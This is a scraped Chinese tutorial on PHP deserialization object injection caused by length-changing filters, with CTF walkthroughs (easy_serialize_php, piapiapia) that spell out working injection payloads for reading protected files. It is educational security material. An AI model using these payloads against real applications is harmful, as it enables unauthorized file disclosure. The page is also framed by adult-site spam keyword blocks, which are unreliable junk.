婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > 淺析PHP反序列化中過濾函數使用不當導致的對象注入問題

淺析PHP反序列化中過濾函數使用不當導致的對象注入問題

熱門標簽:南京3D地圖標注 邢臺400電話辦理 嘟嘟云外呼系統 濟源百應電銷機器人聯系方式 重慶外呼電銷系統多少錢 辦理400電話哪家好點 咸陽電銷 南寧電話外呼系統線路 正規電銷機器人系統

1.漏洞產生的原因

#### 正常的反序列化語句是這樣的

$a='a:2:{s:8:"username";s:7:"dimpl3s";s:8:"password";s:6:"abcdef";}';

但是如果寫成這樣

$b='a:2:{s:8:"username";s:7:"dimpl3s";s:8:"password";s:6:"123456";}s:8:"password";s:6:"abcde";}';

也可以正常的編譯, 而且下面一條語句的結果是 password=“123456” 而不是abcde

結果

這就說明一個問題,在反序列化的時候,只要求第一個序列化字符串合法就行,換我個理解,就是反序列話時,他會從前往后讀取,當讀取第一個合法的序列化的字符串時,就會反序列化。

### 當過濾用戶輸入參數的時候,如果先序列化再對序列化過后的字符串進行過濾,而且在過濾的過程中會導致原本的長度改變,就可能造成序列化對象注入漏洞。

此處參考別人的代碼:

可以看到,這里過濾函數將原來的x換成了zz,但是長度卻超過了原來的長度 ,但是原來長度的數字時沒變的,這就導致報錯。但是試想一下,如果這里的密碼是可控的,然后我們輸入字符

的時候帶入雙引號和} 會怎么樣呢? 看如下代碼

結果

第一排是我們構造的東西序列化過后的值,

第二排是序列化過后的值進行過濾過后的值,可以看到,此時由于x換成了z,而前面讀40的時候正好會讀到最后一個x,從而使我們輸入的新對象得以注入,而且得到正常的反序列化。

第三排是反序列化過后的到的值,此時原本的aaaaaa的值已經被我們覆蓋。

二:實例分析

根據上面的原因可知,產生漏洞最直接的原因是因為序列化過后的字符串被過濾的時長度發生變化, 根據這個這個原因,我們就可以把漏洞分為 長度變長,和長度變短兩種情況,注意! 如果長度不變的話,不會引起漏洞產生。

(1) 長度變短。

題目: 安洵杯2019 easy_serialize_php // 在https://buuoj.cn/這個靶場里又復現

源碼:

根據提示在phpinfo拿到

很顯然答案在 d0g3_f1ag.php里面,關鍵是我們怎么去讀取他的源碼 ,可以看到最后一排的會獲取 ['img'] 中的 的源碼,我們僅需要覆蓋img的值將他變成d0g3_f1ag.php就行。

在看這個過濾函數

他會使得輸入的相應字符變為空,也就是讓序列化后的字符串變短,我們就可以利用此來吞掉原本的變量名,而注入我們想注入的代碼。

第一種解法:值逃逸

d0g3_f1ag.php的base64 編碼 ZDBnM19mMWFnLnBocA== 長度20

在本地測試的時候得到正常的 序列化字符是這樣的

a:3:{s:4:"user";s:5:"guest";s:8:"function";s:3:"123";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

前者user,和function 的值都是我們可控的

我們想要構造的是 s:3:"img";s:20:"ZDBnM19mMWFnLnBocA=="; 設想一下 ,如果我們把它設置function的值,并且在前面user的值利用過濾函數將后面的 "s:8:"function";s:xx:" 吞掉,那么function的值,也就是我們想要注入的對象,不就正好上位了嗎? 但是注意閉合前面的由于吞掉而缺少的分號和雙引號,而且,這里兩個雙引號緊挨著會報錯,所以我們加一個字符,再把這個字符一起吞掉就行,還有 這里前面是 a:3: 所以我在最后還要添加一個屬性。

payload

_SESSION[user]=flagflagflagflagflagflag_SESSION[function]=a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}

讀到源碼

再去修改payload的文件中的值,然后再去訪問,發現什么也沒有返回,然后嘗試 /../d0g3_fllllllag 然后base64編碼 去訪問就會返回flag

(2)長度變長

題目 [0CTF] piapiapia // 同樣在buu里又復現

wp參考這里 -> https://www.jb51.net/article/180496.htm

a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:8:"ss@q.com";s:8:"nickname";s:8:"sea_sand";s:5:"photo";s:10:"config.php";}s:39:"upload/804f743824c0451b2f60d81b63b6a900";}

紅色部分是我們想要注入的,這道題的過濾函數有三個 ,但是導致長度變化的過濾是這個

where->hacker 多出了一個字符

但是另一個過濾使 nickname 有長度限制

這里strlen我們可以用數組繞過,但是如果使用數組就會引起序列化字符串產生變化

a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:8:"ss@q.com";s:8:"nickname";a:1:{i:0;s:3:"xxx"};s:5:"photo";s:10:"config.php";}s:39:"upload/804f743824c0451b2f60d81b63b6a900";}

注意數組在序列化中的表示 是 先; 再 }

這里我進行了本地測試

結果:

紅色部分為我們想注入的,藍色的是我們提交payload的地方,后面實際上根本不用管

現在我們想的是通過where ->hacker 多了一個字符,這樣使我們輸入的nickname的值逃逸出去變成對象,

加上閉合前面的單引號和反括號 就是這樣 ";}s:5:"photo";s:10:"config.php";}

一共就是34個字符, 一個where 逃逸出一個字符,這里就需要34個where

payload:wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}    

三.總結

武漢加油!中國加油!我加油!

以上所述是小編給大家介紹的PHP反序列化中過濾函數使用不當導致的對象注入問題,希望對大家有所幫助!

您可能感興趣的文章:
  • 詳解php命令注入攻擊
  • php使用exec shell命令注入的方法講解
  • PHP依賴注入容器知識點淺析
  • PHP使用PDO實現mysql防注入功能詳解
  • PHP防止sql注入小技巧之sql預處理原理與實現方法分析
  • php+laravel依賴注入知識點總結
  • php依賴注入知識點詳解
  • php中的依賴注入實例詳解
  • thinkphp5.1框架容器與依賴注入實例分析
  • PHP進階學習之依賴注入與Ioc容器詳解
  • php反射學習之依賴注入示例
  • CTF命令執行及繞過技巧

標簽:通遼 黃山 隴南 武漢 南通 河南 平頂山 唐山

巨人網絡通訊聲明:本文標題《淺析PHP反序列化中過濾函數使用不當導致的對象注入問題》,本文關鍵詞  淺析,PHP,反,序列化,中,過濾,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《淺析PHP反序列化中過濾函數使用不當導致的對象注入問題》相關的同類信息!
  • 本頁收集關于淺析PHP反序列化中過濾函數使用不當導致的對象注入問題的相關信息資訊供網民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    欧美三日本三级三级在线播放| 一二三区精品福利视频| 国产一区二区不卡老阿姨| 亚洲国产一区二区三区青草影视 | 欧美色爱综合网| 成人午夜免费av| 国产一区免费电影| 国产.欧美.日韩| 丁香六月久久综合狠狠色| 国产成人免费9x9x人网站视频| 狠狠色综合色综合网络| 国产中文字幕精品| 91老司机福利 在线| 欧美亚洲免费在线一区| 精品成人一区二区三区| 欧美精品自拍偷拍| 日韩精品中文字幕一区| 国产精品网站在线观看| 亚洲精选视频在线| 国产在线精品不卡| 国产成人综合在线观看| 97久久超碰精品国产| 日韩一卡二卡三卡四卡| 日韩av电影免费观看高清完整版 | 7878成人国产在线观看| 538prom精品视频线放| 国产欧美一区在线| 日韩福利电影在线| 亚洲成a人片综合在线| 国产成人久久精品77777最新版本| 波多野结衣91| 久久免费视频一区| 日本不卡中文字幕| 欧美日韩专区在线| **网站欧美大片在线观看| 亚洲网友自拍偷拍| 欧美伊人久久久久久久久影院| 精品国产污污免费网站入口| 亚洲成av人影院| 欧美日韩在线观看一区二区| 一区二区三区日本| 欧美日韩高清在线播放| 亚洲国产精品自拍| 欧美日韩黄视频| 一区二区三区国产精华| 一区二区三区在线免费视频| 91美女在线视频| 亚洲资源中文字幕| 国产成人一区在线| 久久久www免费人成精品| 麻豆成人免费电影| 欧美日韩视频在线第一区| 亚洲欧美日韩中文字幕一区二区三区| 国产美女娇喘av呻吟久久| 欧美精选午夜久久久乱码6080| 日本91福利区| 亚洲少妇最新在线视频| 欧美三级电影在线看| 韩国成人在线视频| 国产视频一区在线观看| 91丝袜美腿高跟国产极品老师| 亚洲va国产天堂va久久en| 久久免费视频色| 日本女人一区二区三区| 99久久免费精品高清特色大片| 日本成人在线网站| 亚洲欧美在线观看| 国产美女精品人人做人人爽| 中文字幕一区二区三区四区不卡 | 欧美zozozo| 一本久久a久久精品亚洲| 久久久亚洲精品石原莉奈| 色婷婷精品大在线视频| 综合婷婷亚洲小说| 日韩一区二区三| 从欧美一区二区三区| 亚洲一区中文在线| 精品国产亚洲一区二区三区在线观看| 美洲天堂一区二卡三卡四卡视频| 在线成人av网站| 91福利精品第一导航| 国产不卡在线一区| 国产一区二区免费看| 久久91精品国产91久久小草| 国产高清一区日本| 无码av免费一区二区三区试看 | 日韩三级视频在线看| 成人一区二区三区视频在线观看| 一区二区三区欧美日| 欧美亚洲综合在线| 色综合天天性综合| 波波电影院一区二区三区| 激情综合五月婷婷| 毛片av一区二区| 精品在线视频一区| 精品一区二区三区不卡| 日本欧洲一区二区| 欧美a级一区二区| 欧美嫩在线观看| 5858s免费视频成人| 精品国产青草久久久久福利| 久久久久久久久久久久久女国产乱| 色综合天天综合网国产成人综合天| 成人av午夜电影| 91视频免费看| 欧美日韩国产高清一区| 精品久久久久一区| 中文字幕一区二区三区四区不卡| 国产精品福利电影一区二区三区四区| 亚洲国产高清aⅴ视频| 久久久久9999亚洲精品| 国产精品免费视频观看| 亚洲国产欧美在线| 国产一区二区电影| www.亚洲国产| 91.麻豆视频| 亚洲欧美在线aaa| 日韩avvvv在线播放| 粉嫩欧美一区二区三区高清影视| 色综合 综合色| 欧美精品一区二区不卡| 国产精品久久久久一区| 日韩电影在线免费| 丁香天五香天堂综合| 欧美成人在线直播| 亚洲综合清纯丝袜自拍| zzijzzij亚洲日本少妇熟睡| 亚洲精品一区二区三区四区高清| 亚洲三级小视频| 色综合天天视频在线观看| 久久综合九色综合久久久精品综合| 一区二区三区四区不卡视频| 99视频在线精品| 国产精品久久久久影院色老大| 国精产品一区一区三区mba桃花| 欧美日韩和欧美的一区二区| 一区二区三区在线免费视频| 国产成人日日夜夜| 国产精品乱人伦中文| 成人黄色在线网站| 亚洲精品成人在线| 欧美伊人精品成人久久综合97| 夜夜嗨av一区二区三区四季av| 97超碰欧美中文字幕| 一个色妞综合视频在线观看| 777午夜精品视频在线播放| 国产一区二区精品久久| 亚洲国产精品成人综合| 国产激情视频一区二区在线观看 | 92精品国产成人观看免费| 亚洲福利视频导航| 久久亚洲精品小早川怜子| 亚洲欧美日韩精品久久久久| 日本伦理一区二区| 久久精工是国产品牌吗| 中文字幕在线视频一区| 91精品在线免费| 成人精品高清在线| 一区二区三区国产精华| 亚洲日本韩国一区| 久久久久9999亚洲精品| 99在线热播精品免费| 国产黄色精品网站| 经典三级视频一区| 亚洲一区视频在线观看视频| 国产精品久久久久久久久晋中 | 欧美美女一区二区三区| 成人午夜伦理影院| 国产成人在线影院| 亚洲老妇xxxxxx| 国产精品乱人伦一区二区| 国产亚洲成av人在线观看导航| 91精品国产综合久久福利软件| 色哟哟精品一区| 在线综合+亚洲+欧美中文字幕| 在线免费精品视频| 欧美午夜精品电影| 一本色道久久综合亚洲精品按摩| 成人精品鲁一区一区二区| 岛国精品在线观看| 色综合久久天天| 欧美午夜精品久久久久久孕妇| 91福利视频久久久久| 欧洲色大大久久| 色88888久久久久久影院按摩 | 午夜日韩在线电影| 亚洲欧洲av色图| 日韩精品一区二区三区中文不卡| 欧美日韩aaa| 国产亚洲欧美中文| 中文在线一区二区| 欧美国产一区二区在线观看| 国产精品午夜免费| 亚洲国产精品一区二区www在线| 青青国产91久久久久久| 狠狠色丁香婷婷综合| 色综合天天综合色综合av | 麻豆91在线看| 欧美成人a∨高清免费观看| 国产丝袜在线精品|